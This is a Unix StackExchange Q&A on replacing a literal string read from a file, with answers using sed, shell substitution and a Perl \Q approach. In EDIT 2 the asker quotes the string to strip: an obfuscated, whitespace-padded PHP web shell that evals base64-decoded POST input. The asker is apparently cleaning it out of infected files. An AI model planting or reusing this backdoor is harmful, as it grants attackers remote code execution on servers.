# How to read needle part of the sed command from a file?

Tags: shell-script, text-processing, sed, replace

I want to replace a long part of a file with something else preferably by sed but want to read that long part from a file. I already found this:

```
sed -e '/<TEXT1>/{r File1' -e 'd}' File2
```

from [here](https://unix.stackexchange.com/questions/20322/replace-string-with-contents-of-a-file-using-sed) which is the exact opposite of what I want to achieve. I tried lot of things like the following but all give the wrong result:

```
sed -e '/r needle.txt/replace' subject.txt
```

**EDIT 1**

needle.txt is not regex, just the text I want to be replaced with lots of non ascii characters.

**EDIT 2**

the exact string I'm dealing with is this:

```
<?php                                                                                                                                                                                                                                                               $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n1509e9'];if(isset($s22)){eval($s21($s22));}?><?php
```

I want to keep the last `<?php`

Comment: Could you please clarify? What is `<TEXT>` supposed to be? Where is the replacement pattern? Is it in File1? If so, is it a multiline pattern? Could you add an example? Are you just looking for `foo=$(cat file1); sed "s/$foo/replacement/"`?

Comment: @terdon yes I want something like your example. and no it's not multiline pattern and isn't regex either, just simple string of characters (non ascii too).

Comment: @sepehr What is exactly in `needle.txt` and `subject.txt`? Show example. Anyway I think this is [XY problem](http://mywiki.wooledge.org/XyProblem).

Comment: `sed 's/^\(<?php\).*\(?><?php\)$/\1replace\2/' subject.txt` ?

Comment: @Costas tnx, `sed 's/^<?php.*\(<?php\)$/\1/'` did the trick for me. can you answer if that's possible to read the search part from a file without worring about if it need escaping?

Comment: The recipie already offered by @Joseph R. `sed "s/$(cat needle.txt)/replace/"` Or you asking for script file to dial as `sed -f script.file subject.file`?

Comment: @Costas it doesn't work. I guess it's not possible to simply read from a file without escaping meta characters. see this: http://unix.stackexchange.com/questions/32907/what-characters-do-i-need-to-escape-when-using-sed-in-a-sh-script

Comment: I'd tested your pattern and find out the source of problem. There are only one simbol `[` and it's opposite `]` which clarify by `bash` as `range`. So we need to escape them. Just a trick `sed "s/$(cat needle.txt | sed 's/[][]/\\&/g')/replace/"`

Answer (score 4, accepted):

You can have the shell expand the file's contents before passing them to `sed`:

```
sed -e "s/$(cat needle.txt)/replace/" subject.txt
```

Note the use of double quotes.

This will make `sed` interpret any regex metacharacters from `needle.txt` as regex metacharacters and not ordinary characters. It will break if `needle.txt` contains a `/`.

In case you want the lines of `needle.txt` to be interpreted literally (even if they contain regex metacharacters as in your example), you can do something like:

```
perl -pe '
    BEGIN{ local $/; 
           open $IN,"<","needle.txt";
           $needle = <$IN>
    }
    s/\Q$needle/replace/
'  subject.txt
```

**Explanation**

- The `-pe` switches mean apply the code that follows line by line to the lines of the `subject.txt` file and print each line after you're done processing it.
- The `BEGIN{}` segment is only executed once. What it does is it opens the `needle.txt` file and stores all of its contents in the `$needle` variable.
- `s/\Q$needle/replace/` is the same syntax you'd expect from `sed` except that `\Q` causes Perl's regex engine to treat everything after it as a fixed string rather than a regex.

Comment: needle.txt is not a regex, it's the text I want to be replaced and has a lot of non ascii characters,tnx.

Comment: @sepehr That's not replacing the text of `needle.txt`, it's using the `cat` command to output the contents of that file and do a search through it and replace using `replace`.

Comment: @sepehr Please see if the alternative in Perl is more suited to your needs. I'm writing an explanation for it now.

Comment: @JosephR. perl script works perfectly, tnx alot. now that my question is more clear can you confirm that doing this in sed without first escaping the needle is impossible?

Comment: @sepehr I can't confirm one way or the other: I'm not that well-versed in `sed`. But there doesn't seem to be a common way. [This Q&A on SO](http://stackoverflow.com/questions/4133286/sed-or-similar-dont-interpret-as-regex-interpret-as-fixed-string-literal) was one of the first places I checked before attempting to answer your question. It seems that people are trying to avoid the use of `sed` there as well.

Answer (score 1):

`sed` is very peculiar about `r`ead - it will only do it for the line which matched its pattern - and it will always do it *last*. `sed` won't `r`ead out a file for a matching pattern if the pattern ceases to match before it flushes the line. At least that's how I think it works - I'm pretty good with `sed` but `r` still baffles me sometimes.

Anyway, the trick is to let it flush the line with the pattern it wants - thereby ensuring the output for that line, but to delay that output at least by one line and then to edit it.

You can do this relatively easily w/ `N;P;D` - which will work in concert to advance `sed`'s line counter at least one line ahead of lines printed. Consider the following two files:

```
###file1
some string 1
some string 2
some other string
some string 4
some string 5

###file2
some other file
```

Now my goal is to perform a substitution replacing the pattern on which `r`ead depends, *and* to get `r`ead to print its contents *before* my change is printed. Here's how I do it:

```
sed '$!N;s/other \(.*\)\(\n\)/\1 3\2/
     /\n.*other/r file2
     P;D' file1
```

#### OUTPUT

```
some string 1
some string 2
some other file
some string 3
some string 4
some string 5
```

I also did this with a different file2 which printed...

```
some string 1
some string 2
no trailing newline some string 3
some string 4
some string 5
```

I do have some fairly deep reservations about the portability of that behavior, but that was with a GNU `sed`, for what it's worth.

Ok, so in the above commands, `sed` is reading its input one line ahead of when it prints it. `N` appends the next input line to pattern space, `P` prints up to the first `\n`ewline character in pattern space, and `D` deletes up to the first `\n`ewline character in pattern space before starting over with what remains. So every line we see printed is one line behind `sed`'s look at it - `sed` gets a two-line window on the input.

The pattern which matches `r`ead matches only for when a `\n`ewline character occurs *before* it which it matches for the cycle when `sed` first pulls it in with `N` - it only matches the cycle in which we don't see it.

The replacement only occurs when the `\n`ewline occurs *after* the pattern - this is the cycle on which it will be `P`rinted, after all, but `sed` flushes its line buffer and increments the line when we pull in the `N`ext line, so the `r` gets printed then and *then* the replacement occurs. Kind of tedious really, but then so am I.

And speaking of GNU `sed` it does offer a rather interesting option for situations like these, in fact.

```
sed '/other/{x;s/.*/cat file2/e;G
     s/\(.*\)\n\(.* \)other \(.*\)/\1 \2\3 3/
}' file
```

`info sed` will tell you...

- `e [COMMAND]`
   This command allows one to pipe input from a shell command into
   pattern space.  Without parameters, the `e' command executes the
   command that is found in pattern space and replaces the pattern
   space with the output; a trailing newline is suppressed.

There I also do a little pattern space shuffling - I want a blank pattern space in which to run my command, and so I switch to unused hold space. But it is a little more simple to understand because you don't have to consider line flush timings. It is, essentially, what has been suggested by other means already, with perhaps a little benefit in that any of `sed`'s special characters will not generate an error if they exist in the target read file.

Oh by the way, the above prints:

```
some string 1
some string 2
some other file some string 3
some string 4
some string 5
```